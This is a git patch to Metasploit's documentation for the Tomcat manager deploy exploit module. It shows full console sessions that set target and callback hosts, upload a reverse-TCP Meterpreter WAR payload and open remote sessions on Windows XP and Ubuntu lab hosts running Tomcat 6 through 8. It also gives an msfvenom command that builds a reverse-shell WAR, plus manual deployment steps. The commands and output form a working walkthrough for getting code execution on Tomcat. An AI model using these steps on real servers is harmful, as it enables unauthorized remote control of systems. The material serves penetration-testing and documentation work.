From bed08db43c8f42befba7fb388e96f4e4f89d2b1c Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 14 Jan 2017 19:17:37 -0500 Subject: [PATCH] more to edit --- .../exploit/multi/http/tomcat_mgr_deploy.md | 499 ++++++++++++------ 1 file changed, 331 insertions(+), 168 deletions(-) diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index 4751c7d86f..6dd5630a1b 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -2,6 +2,9 @@ This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way. +# Cleanup +It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually. + ## Windows (xp sp2) ### Tomcat 6 (6.0.48) #### Setup @@ -9,10 +12,57 @@ This documentation is broken down by OS, Tomcat version, then privilege to show 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. +The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +For this exploitation, it was changed to simply `manager` -#### text/script interface +#### text/script Interface +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `` line: + ``` + + + ``` + +2. Restart Tomcat service +3. Exploit: + + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > set rport 8086 + rport => 8086 + msf exploit(tomcat_mgr_deploy) > set path /manager + path => /manager + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6071 bytes as scEYoK0.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp... + [*] Undeploying scEYoK0 ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + + ``` ### Tomcat 7 (7.0.73) #### Setup @@ -23,7 +73,57 @@ The install was default, other than adding a user during install. No other opti Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. So the `/manager/html` page was visible, but deploying from there wasn't possible. -#### text/script interface +#### text/script Interface +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `` line: + + ``` + + + ``` + +2. Restart the service +3. Exploitation: + + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set rport 8087 + rport => 8087 + msf exploit(tomcat_mgr_deploy) > set payload java/ + set payload java/meterpreter/bind_tcp set payload java/meterpreter/reverse_tcp set payload java/shell_reverse_tcp + set payload java/meterpreter/reverse_http set payload java/shell/bind_tcp + set payload java/meterpreter/reverse_https set payload java/shell/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp... + [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + ``` ### Tomcat 8 (8.0.39) #### Setup @@ -37,156 +137,166 @@ So the /manager/html page was visible, but deploying from there wasn't possible. #### text/script interface -1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following: -``` - - -``` +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the ` use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 -rhost => 192.168.2.108 -msf exploit(tomcat_mgr_deploy) > set rport 8088 -rport => 8088 -msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp -payload => java/meterpreter/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set target 1 -target => 1 -msf exploit(tomcat_mgr_deploy) > exploit -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit + ``` + + + ``` -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Java Universal" -[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... -[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... -[*] Undeploying c6TYmkd8YAe8LqKQhSCr ... -[*] Sending stage (49409 bytes) to 192.168.2.108 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 - -meterpreter > sysinfo -Computer : winxp -OS : Windows XP 5.1 (x86) -Meterpreter : java/windows -``` +2. Restart the service +3. Exploitation: + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set rport 8088 + rport => 8088 + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > exploit + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... + [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... + [*] Undeploying c6TYmkd8YAe8LqKQhSCr ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + ``` ## Linux ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit #### Setup -``` -sudo apt-get install tomcat6 tomcat6-admin -``` + +1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin` + #### Exploit 1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following: -``` - - -``` + + ``` + + + ``` + 2. Restart Tomcat: `sudo service tomcat6 restart` 3. Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 -rhost => 192.168.2.156 -msf exploit(tomcat_mgr_deploy) > set rport 8080 -rport => 8080 -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > exploit -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp... -[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.156 -[*] Undeploying 9bj4IYa66cSpdK ... -[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 - -meterpreter > sysinfo -Computer : Ubuntu14.04 -OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) -Architecture : x64 -Meterpreter : x86/linux -``` + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 + rhost => 192.168.2.156 + msf exploit(tomcat_mgr_deploy) > set rport 8080 + rport => 8080 + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.156 + [*] Undeploying 9bj4IYa66cSpdK ... + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 + + meterpreter > sysinfo + Computer : Ubuntu14.04 + OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. + #### Setup -1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin` +1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin` #### text/script interface 1. Edit `/etc/tomcat7/tomcat-users.xml` to add: -``` - - -``` + + ``` + + + ``` + 2. Restart Tomcat: `sudo service tomcat7 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 -rhost => 192.168.2.118 -msf exploit(tomcat_mgr_deploy) > set rport 8087 -rport => 8087 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > exploit -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp... -[*] Undeploying 9QymzSGGU0H4e ... -[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.118 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 + rhost => 192.168.2.118 + msf exploit(tomcat_mgr_deploy) > set rport 8087 + rport => 8087 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > exploit + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp... + [*] Undeploying 9QymzSGGU0H4e ... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.118 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 + + meterpreter > sysinfo + Computer : 192.168.2.118 + OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` -meterpreter > sysinfo -Computer : 192.168.2.118 -OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) -Architecture : x64 -Meterpreter : x86/linux -``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. @@ -197,51 +307,104 @@ Of note, as of 7, the permission role 'manager' has been divided into several su #### text/script interface 1. Edit `/etc/tomcat8/tomcat-users.xml` to add: -``` - - -``` + ``` + + + ``` 2. Restart tomcat: `sudo service tomcat8 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 -rhost => 192.168.2.118 -msf exploit(tomcat_mgr_deploy) > set rport 8088 -rport => 8088 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit - -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp... -[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ... -[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.118 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 - -meterpreter > sysinfo -Computer : 192.168.2.118 -OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) -Architecture : x64 -Meterpreter : x86/linux -``` + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 + rhost => 192.168.2.118 + msf exploit(tomcat_mgr_deploy) > set rport 8088 + rport => 8088 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp... + [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.118 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 + + meterpreter > sysinfo + Computer : 192.168.2.118 + OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. + + +# Manual Exploitation + +## Create payload +This was performed on Windows XP with the following permissions as the user that was used to login: +Tomcat 6.0.48: manager +Tomcat 7.0.73: manager-gui +Tomcat 8.0.39: manager-gui + +``` +/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war +Payload size: 6072 bytes +Final size of war file: 6072 bytes +Saved as: meterp.war +``` +## Setup Handler +``` +msf > use exploit/multi/handler +msf exploit(handler) > set payload java/meterpreter/reverse_tcp +payload => java/meterpreter/reverse_tcp +msf exploit(handler) > set lhost 192.168.2.117 +lhost => 192.168.2.117 +msf exploit(handler) > set lport 7777 +lport => 7777 +msf exploit(handler) > exploit + +[*] Started reverse TCP handler on 192.168.2.117:7777 +[*] Starting the payload handler... +``` +## Deploy +1. With a web browser, browse to `http://:/manager/html` +2. Enter credentials (no default) +3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy` +4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed. +5. Either click the link for `/meterp` or browse to `http://:/meterp/` + +## Callback +After browsing to that page, code execution will happen, and your callback will hit. +``` +[*] Starting the payload handler... +[*] Sending stage (49409 bytes) to 192.168.2.108 +[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500 + +meterpreter > sysinfo +Computer : winxp +OS : Windows XP 5.1 (x86) +Meterpreter : java/windows +``` + +## Cleanup + +This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat. \ No newline at end of file